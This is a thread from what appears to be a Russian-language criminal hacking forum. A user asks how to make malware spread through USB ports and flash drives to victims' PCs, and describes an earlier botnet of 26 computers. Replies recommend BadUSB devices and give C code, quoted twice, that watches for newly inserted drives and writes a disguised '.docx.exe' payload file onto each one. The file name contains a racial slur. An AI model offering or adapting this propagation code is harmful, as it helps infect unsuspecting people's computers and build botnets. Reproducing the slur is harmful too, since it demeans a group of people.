• XSS.stack #1 – первый литературный журнал от юзеров форума

Как заразить USB порт?

Отслеживать
DedJhones

DedJhones

(L3) cache
Пользователь
Регистрация
25.03.2023
Сообщения
185
Реакции
64
Как заразить USB порт?
Допустим хочу установить зловредный манер на пк жертвы через флешку/usb порт
Как после подключения флеши или после запуска зловреда заразить usb порт так, чтобы другие флешки, вставленные в этот порт тоже заражались, вставлялись в другие пк и заражали и другие пк?
Помню проводил данную практику в школе несколько лет назад. Заразив всего 1 usb порт у меня через неделю был ботнет из 26 пк. Но сейчас уже и не вспомню как, чего я делал чтобы реализовать данную идею
 
Badusb атака. Тебе нужен девайс которым ты все это будешь делать.
Ты можешь взять Rubber Ducky в которого огромный функционал для Badusb атак , или сделать самому из платы Arduino micro pro - https://xss.pro/threads/76979/
Или посмотри на алике некоторые badusb , но предупреждаю - там будет очень много ебли.

Я заканчиваю писать свою статью про Rubber Ducky и Badusb атаки , на днях она будет на форуме , пингану тебе сюда с материалом , думаю чем то помогу.
 
DedJhones сказал(а):
чтобы другие флешки, вставленные в этот порт тоже заражались
Если вкратце, то надо хук повесить на usb, чтобы ОС отправляла сообщение твоему процессу, который будет это событие как-то обрабатывать. Задача в целом тривиальна.

Вот пример кода:
C: 
char FirstDriveFromMask( ULONG unitmask )   //Функция для получения буквы устройства
 {
  char i;

  for (i = 0; i < 26; ++i)
   {
    if (unitmask & 0x1)
      break;
    unitmask = unitmask >> 1;
   }

  return( i + 'A' );
}


LRESULT CALLBACK WinProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    switch(uMsg)
    {
        case WM_DEVICECHANGE:
            {
               if(wParam == DBT_DEVICEARRIVAL){ //Если устройство подключилось
                    ZeroMemory(FILEPATH,MAX_PATH);//Зануляем память в буфере(для пути)
                    PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lParam;
                    StringCchPrintf(FILEPATH,MAX_PATH,"\\\\?\\%c:\\my_nigger_payload.docx.exe", 
                    FirstDriveFromMask(lpdbv ->dbcv_unitmask));//Пишем путь
                    hFile = CreateFile(FILEPATH,GENERIC_WRITE,0,nullptr,
                                CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,nullptr);
                    //Записываем пэйлоад...
                    CloseHandle(hFile);
               }
            }
        return 0;
        case WM_DESTROY:
            //doing nothing...
        break;
    }
    return DefWindowProc(hwnd,uMsg,wParam,lParam);
}


Код вытащил из контекста другой проги, чисто для демонстрации, поэтому не ругайте :)


В общем создаёшь окно, вешаешь на него этот колбек и собственно всё. Правда не знаю, как авер на это среагирует.

DedJhones сказал(а):
вставлялись в другие пк и заражали и другие пк
Для этого нужен badusb, либо уязвимость в ОС, чтобы твой payload сам запустился.
 
DedJhones сказал(а):
Как заразить USB порт?
Допустим хочу установить зловредный манер на пк жертвы через флешку/usb порт
Как после подключения флеши или после запуска зловреда заразить usb порт так, чтобы другие флешки, вставленные в этот порт тоже заражались, вставлялись в другие пк и заражали и другие пк?
Помню проводил данную практику в школе несколько лет назад. Заразив всего 1 usb порт у меня через неделю был ботнет из 26 пк. Но сейчас уже и не вспомню как, чего я делал чтобы реализовать данную идею
https://xss.pro/threads/87687/
 
ALPAN сказал(а):
Если вкратце, то надо хук повесить на usb, чтобы ОС отправляла сообщение твоему процессу, который будет это событие как-то обрабатывать. Задача в целом тривиальна.

Вот пример кода:
C: 
char FirstDriveFromMask( ULONG unitmask )   //Функция для получения буквы устройства
 {
  char i;

  for (i = 0; i < 26; ++i)
   {
    if (unitmask & 0x1)
      break;
    unitmask = unitmask >> 1;
   }

  return( i + 'A' );
}


LRESULT CALLBACK WinProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    switch(uMsg)
    {
        case WM_DEVICECHANGE:
            {
               if(wParam == DBT_DEVICEARRIVAL){ //Если устройство подключилось
                    ZeroMemory(FILEPATH,MAX_PATH);//Зануляем память в буфере(для пути)
                    PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lParam;
                    StringCchPrintf(FILEPATH,MAX_PATH,"\\\\?\\%c:\\my_nigger_payload.docx.exe",
                    FirstDriveFromMask(lpdbv ->dbcv_unitmask));//Пишем путь
                    hFile = CreateFile(FILEPATH,GENERIC_WRITE,0,nullptr,
                                CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,nullptr);
                    //Записываем пэйлоад...
                    CloseHandle(hFile);
               }
            }
        return 0;
        case WM_DESTROY:
            //doing nothing...
        break;
    }
    return DefWindowProc(hwnd,uMsg,wParam,lParam);
}


Код вытащил из контекста другой проги, чисто для демонстрации, поэтому не ругайте :)


В общем создаёшь окно, вешаешь на него этот колбек и собственно всё. Правда не знаю, как авер на это среагирует.


Для этого нужен badusb, либо уязвимость в ОС, чтобы твой payload сам запустился.
благодарен)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
DedJhones сказал(а):
Как заразить USB порт?
Допустим хочу установить зловредный манер на пк жертвы через флешку/usb порт
Как после подключения флеши или после запуска зловреда заразить usb порт так, чтобы другие флешки, вставленные в этот порт тоже заражались, вставлялись в другие пк и заражали и другие пк?
Помню проводил данную практику в школе несколько лет назад. Заразив всего 1 usb порт у меня через неделю был ботнет из 26 пк. Но сейчас уже и не вспомню как, чего я делал чтобы реализовать данную идею
goto github and search nyan cat ,,you will get good result
 
Пожалуйста, обратите внимание, что пользователь заблокирован
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх